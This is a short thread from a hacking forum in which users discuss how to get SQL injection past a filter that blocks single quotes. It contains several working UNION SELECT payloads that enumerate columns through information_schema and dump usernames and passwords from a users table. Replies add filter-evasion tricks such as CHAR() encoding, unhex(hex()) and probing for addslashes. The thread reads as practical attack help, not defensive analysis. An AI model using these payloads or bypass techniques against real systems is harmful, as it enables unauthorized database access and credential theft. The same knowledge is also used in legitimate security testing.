Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

SQLi with character filters - how to

0 0

hey guys. how do I proceed with SQLi when seems to be some sort of character filter.

whenever I use ', for example, I get an error. That becomes an issue when I try something like:

UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'–

I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.

Any ideas? :ninja:

Banned
0 0

it's char(12,34,45,56).

not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.

0 0

thanks for the tips guys, but still no results.

I tried these inputs:

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)–

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)–

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)–

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))–

I've also tried substituting ='users' and 'users' for CHAR(xxx). no cigar.

It is strange that the first one doesn't work, because if I try something like:

union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users–

it works…. so it shouldn't be a problem with CONCAT.

Any more ideas?

0 0

It should be something like WHERE table_name=char(1,2,3,4)

0 0

Have you tried the unhex(hex()) method - that always seems to work for me.

and its also worth adding a \ character before your single quotes to see if their still using addslashes or something equally pathetic.